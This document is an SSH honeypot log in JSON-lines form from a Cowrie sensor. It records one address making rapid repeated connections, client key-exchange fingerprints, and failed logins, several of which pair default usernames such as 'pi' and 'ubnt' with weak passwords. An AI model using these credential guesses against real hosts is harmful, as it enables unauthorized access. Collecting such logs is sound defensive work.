{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.635627Z","src_ip":"87.120.191.13","session":"40a8f0141a31"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"87654321","message":"login attempt [ubnt/87654321] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.853051Z","src_ip":"87.120.191.13","session":"e040c1a2a273"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"87654321","message":"login attempt [ftpuser/87654321] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:50.955229Z","src_ip":"87.120.191.13","session":"f3d7ae13e663"}
{"eventid":"cowrie.login.failed","username":"pi","password":"87654321","message":"login attempt [pi/87654321] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.014519Z","src_ip":"87.120.191.13","session":"40a8f0141a31"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.024024Z","src_ip":"87.120.191.13","session":"ce5450d1cbc0"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39592,"dst_ip":"1.2.3.4","dst_port":22,"session":"6acc4827c4d3","protocol":"ssh","message":"New connection: 87.120.191.13:39592 (1.2.3.4:22) [session: 6acc4827c4d3]","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.046119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.098321Z","src_ip":"87.120.191.13","session":"6acc4827c4d3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.099072Z","src_ip":"87.120.191.13","session":"6acc4827c4d3"}
{"eventid":"cowrie.login.failed","username":"noc","password":"87654321","message":"login attempt [noc/87654321] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.319634Z","src_ip":"87.120.191.13","session":"6acc4827c4d3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.621598Z","src_ip":"87.120.191.13","session":"cf93cfdbcf28"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39632,"dst_ip":"1.2.3.4","dst_port":22,"session":"0365301ba0f9","protocol":"ssh","message":"New connection: 87.120.191.13:39632 (1.2.3.4:22) [session: 0365301ba0f9]","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.644409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.686577Z","src_ip":"87.120.191.13","session":"0365301ba0f9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.687237Z","src_ip":"87.120.191.13","session":"0365301ba0f9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.938812Z","src_ip":"87.120.191.13","session":"e040c1a2a273"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39666,"dst_ip":"1.2.3.4","dst_port":22,"session":"8007919017c4","protocol":"ssh","message":"New connection: 87.120.191.13:39666 (1.2.3.4:22) [session: 8007919017c4]","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.962090Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"87654321","message":"login attempt [ftpuser/87654321] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:51.969851Z","src_ip":"87.120.191.13","session":"0365301ba0f9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.006380Z","src_ip":"87.120.191.13","session":"8007919017c4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.007085Z","src_ip":"87.120.191.13","session":"8007919017c4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.017731Z","src_ip":"87.120.191.13","session":"f3d7ae13e663"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39672,"dst_ip":"1.2.3.4","dst_port":22,"session":"879b45b2489e","protocol":"ssh","message":"New connection: 87.120.191.13:39672 (1.2.3.4:22) [session: 879b45b2489e]","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.055424Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.096620Z","src_ip":"87.120.191.13","session":"40a8f0141a31"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39682,"dst_ip":"1.2.3.4","dst_port":22,"session":"53c5199b94e8","protocol":"ssh","message":"New connection: 87.120.191.13:39682 (1.2.3.4:22) [session: 53c5199b94e8]","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.117599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.132919Z","src_ip":"87.120.191.13","session":"879b45b2489e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.133553Z","src_ip":"87.120.191.13","session":"879b45b2489e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.171314Z","src_ip":"87.120.191.13","session":"53c5199b94e8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.171906Z","src_ip":"87.120.191.13","session":"53c5199b94e8"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin1","message":"login attempt [ubnt/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.278093Z","src_ip":"87.120.191.13","session":"8007919017c4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.406640Z","src_ip":"87.120.191.13","session":"6acc4827c4d3"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39710,"dst_ip":"1.2.3.4","dst_port":22,"session":"221ec9cb425f","protocol":"ssh","message":"New connection: 87.120.191.13:39710 (1.2.3.4:22) [session: 221ec9cb425f]","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.431982Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin1","message":"login attempt [ftpuser/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.448552Z","src_ip":"87.120.191.13","session":"879b45b2489e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.483712Z","src_ip":"87.120.191.13","session":"221ec9cb425f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.484452Z","src_ip":"87.120.191.13","session":"221ec9cb425f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin1","message":"login attempt [pi/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.740072Z","src_ip":"87.120.191.13","session":"53c5199b94e8"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin1","message":"login attempt [noc/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:52.812851Z","src_ip":"87.120.191.13","session":"221ec9cb425f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.057659Z","src_ip":"87.120.191.13","session":"0365301ba0f9"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39718,"dst_ip":"1.2.3.4","dst_port":22,"session":"181659fb26d5","protocol":"ssh","message":"New connection: 87.120.191.13:39718 (1.2.3.4:22) [session: 181659fb26d5]","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.083862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.154748Z","src_ip":"87.120.191.13","session":"181659fb26d5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.155420Z","src_ip":"87.120.191.13","session":"181659fb26d5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.384856Z","src_ip":"87.120.191.13","session":"8007919017c4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49136,"dst_ip":"1.2.3.4","dst_port":22,"session":"509af2943f61","protocol":"ssh","message":"New connection: 87.120.191.13:49136 (1.2.3.4:22) [session: 509af2943f61]","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.415919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.522600Z","src_ip":"87.120.191.13","session":"509af2943f61"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.523285Z","src_ip":"87.120.191.13","session":"509af2943f61"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.555721Z","src_ip":"87.120.191.13","session":"879b45b2489e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin1","message":"login attempt [ftpuser/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.563668Z","src_ip":"87.120.191.13","session":"181659fb26d5"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49146,"dst_ip":"1.2.3.4","dst_port":22,"session":"793abf9a0443","protocol":"ssh","message":"New connection: 87.120.191.13:49146 (1.2.3.4:22) [session: 793abf9a0443]","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.575829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.690214Z","src_ip":"87.120.191.13","session":"793abf9a0443"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.690952Z","src_ip":"87.120.191.13","session":"793abf9a0443"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.872471Z","src_ip":"87.120.191.13","session":"53c5199b94e8"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49160,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3bbc6e7998b","protocol":"ssh","message":"New connection: 87.120.191.13:49160 (1.2.3.4:22) [session: f3bbc6e7998b]","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.907234Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.955147Z","src_ip":"87.120.191.13","session":"221ec9cb425f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49168,"dst_ip":"1.2.3.4","dst_port":22,"session":"f645034c823c","protocol":"ssh","message":"New connection: 87.120.191.13:49168 (1.2.3.4:22) [session: f645034c823c]","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.979014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:53.998884Z","src_ip":"87.120.191.13","session":"f3bbc6e7998b"}
